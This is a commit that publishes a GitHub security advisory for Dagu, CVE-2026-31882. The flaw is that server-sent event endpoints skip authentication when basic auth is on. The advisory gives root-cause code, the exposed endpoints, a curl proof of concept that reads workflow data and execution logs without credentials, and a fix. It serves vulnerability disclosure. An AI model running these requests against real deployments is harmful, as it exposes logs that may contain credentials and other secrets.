Publish GHSA-9wmw-9wph-2vwp

advisory-database[bot] · advisory-database[bot] · commit 45764fe3323d · 2026-03-13T15:07:17.000Z
diff --git a/advisories/github-reviewed/2026/03/GHSA-9wmw-9wph-2vwp/GHSA-9wmw-9wph-2vwp.json b/advisories/github-reviewed/2026/03/GHSA-9wmw-9wph-2vwp/GHSA-9wmw-9wph-2vwp.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-9wmw-9wph-2vwp",
+  "modified": "2026-03-13T15:05:32Z",
+  "published": "2026-03-13T15:05:32Z",
+  "aliases": [
+    "CVE-2026-31882"
+  ],
+  "summary": "Dagu: SSE Authentication Bypass in Basic Auth Mode",
+  "details": "# SSE Authentication Bypass in Basic Auth Mode\n\n## Summary\n\nWhen Dagu is configured with HTTP Basic authentication (`DAGU_AUTH_MODE=basic`), all Server-Sent Events (SSE) endpoints are accessible without any credentials. This allows unauthenticated attackers to access real-time DAG execution data, workflow configurations, execution logs, and queue status — bypassing the authentication that protects the REST API.\n\n## Severity\n\n**HIGH** (CVSS 3.1: 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Versions\n\n- dagu v2.2.3 (latest) and likely all versions with basic auth support\n\n## Affected Component\n\n`internal/service/frontend/server.go` — `buildStreamAuthOptions()` function (lines 1177–1201)\n\n## Root Cause\n\nThe `buildStreamAuthOptions()` function builds authentication options for SSE/streaming endpoints. When the auth mode is `basic`, it returns an `auth.Options` struct with `BasicAuthEnabled: true` but `AuthRequired` defaults to `false` (Go zero value):\n\n```go\n// server.go:1195-1201\nif authCfg.Mode == config.AuthModeBasic {\n    return auth.Options{\n        Realm:            realm,\n        BasicAuthEnabled: true,\n        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},\n        // AuthRequired is NOT set — defaults to false\n    }\n}\n```\n\nThe authentication middleware at `internal/service/frontend/auth/middleware.go:181-183` allows unauthenticated requests when `AuthRequired` is false:\n\n```go\n// No credentials provided\n// If auth is not required, allow the request through\nif !opts.AuthRequired {\n    next.ServeHTTP(w, r)\n    return\n}\n```\n\nThe developers left a FIXME comment (line 1193) acknowledging this issue:\n```\n// FIXME: add a session-token mechanism for basic-auth users so browser\n// EventSource requests can authenticate via the ?token= query parameter.\n```\n\n## Exposed SSE Endpoints\n\nAll SSE routes are affected (`server.go:1004-1019`):\n\n| Endpoint | Data Leaked |\n|----------|-------------|\n| `/api/v1/events/dags` | All DAG names, descriptions, file paths, schedules, tags, execution status |\n| `/api/v1/events/dags/{fileName}` | Individual DAG configuration details |\n| `/api/v1/events/dags/{fileName}/dag-runs` | DAG execution history |\n| `/api/v1/events/dag-runs` | All active DAG runs across the system |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}` | Specific DAG run status and node details |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}/logs` | Execution logs (may contain secrets, credentials, API keys) |\n| `/api/v1/events/dag-runs/{name}/{dagRunId}/logs/steps/{stepName}` | Step-level stdout/stderr logs |\n| `/api/v1/events/queues` | Queue status and pending work items |\n| `/api/v1/events/queues/{name}/items` | Queue item details |\n| `/api/v1/events/docs-tree` | Documentation tree |\n| `/api/v1/events/docs/*` | Documentation content |\n\nAdditionally, the Agent SSE stream uses the same auth options (`server.go:1166`).\n\n## Proof of Concept\n\n### Setup\n```bash\n# Start Dagu with basic auth\nexport DAGU_AUTH_MODE=basic\nexport DAGU_AUTH_BASIC_USERNAME=admin\nexport DAGU_AUTH_BASIC_PASSWORD=secret123\ndagu start-all\n```\n\n### Verify REST API requires auth\n```bash\n# Regular API — returns 401 Unauthorized\ncurl -s -o /dev/null -w \"%{http_code}\" http://localhost:8080/api/v1/dags\n# Output: 401\n\n# With credentials — returns 200\ncurl -s -o /dev/null -w \"%{http_code}\" -u admin:secret123 http://localhost:8080/api/v1/dags\n# Output: 200\n```\n\n### Exploit SSE bypass\n```bash\n# SSE endpoint WITHOUT any credentials — returns 200 with full data\ncurl -s -N http://localhost:8080/api/v1/events/dags\n```\n\n**Output (truncated):**\n```\nevent: connected\ndata: {\"topic\":\"dagslist:\"}\n\nevent: data\ndata: {\"dags\":[{\"dag\":{\"name\":\"example-01-basic-sequential\",\"schedule\":[],...},\n\"filePath\":\"/home/user/.config/dagu/dags/example-01-basic-sequential.yaml\",\n\"latestDAGRun\":{\"dagRunId\":\"...\",\"status\":4,\"statusLabel\":\"succeeded\",...}},\n...]}\n```\n\n```bash\n# Access execution logs without credentials\ncurl -s -N http://localhost:8080/api/v1/events/dag-runs/{dagName}/{runId}/logs\n```\n\n**Output:**\n```\nevent: data\ndata: {\"schedulerLog\":{\"content\":\"...step execution details, parameters, outputs...\"},\"stepLogs\":[...]}\n```\n\n### Wrong credentials are rejected\n```bash\n# Invalid credentials — returns 401 (auth validates IF provided, but doesn't REQUIRE it)\ncurl -s -o /dev/null -w \"%{http_code}\" -u wrong:wrong http://localhost:8080/api/v1/events/dags\n# Output: 401\n```\n\n## Impact\n\nAn unauthenticated network attacker can:\n\n1. **Enumerate all workflows**: DAG names, descriptions, file paths, schedules, and tags\n2. **Monitor execution in real-time**: Track which workflows are running, their status, and when they complete\n3. **Read execution logs**: Access stdout/stderr of workflow steps, which commonly contain sensitive data (API keys, database credentials, tokens, internal hostnames)\n4. **Map infrastructure**: File paths and workflow configurations reveal server directory structure and deployment details\n5. **Observe queue state**: Understand pending work items and system load\n\nThis is especially critical in environments where:\n- Workflows process sensitive data (credentials, PII, financial data)\n- DAG parameters contain secrets passed at runtime\n- Log output includes API responses or database queries with sensitive content\n\n## Suggested Fix\n\nSet `AuthRequired: true` for basic auth mode and implement the session-token mechanism referenced in the FIXME comment:\n\n```go\nif authCfg.Mode == config.AuthModeBasic {\n    return auth.Options{\n        Realm:            realm,\n        BasicAuthEnabled: true,\n        AuthRequired:     true,  // Require authentication\n        Creds:            map[string]string{authCfg.Basic.Username: authCfg.Basic.Password},\n    }\n}\n```\n\nFor browser SSE compatibility, implement a session token that can be passed via the `?token=` query parameter (the `QueryTokenMiddleware` already exists at `auth/middleware.go:39` to convert query params to Bearer tokens).",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "dagu"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.2.4"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-9wmw-9wph-2vwp"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/dagu-org/dagu/commit/064616c9b80c04824c1c7c357308f77f3f24d775"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/dagu-org/dagu"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/dagu-org/dagu/releases/tag/v2.2.4"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-306"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T15:05:32Z",
+    "nvd_published_at": null
+  }
+}
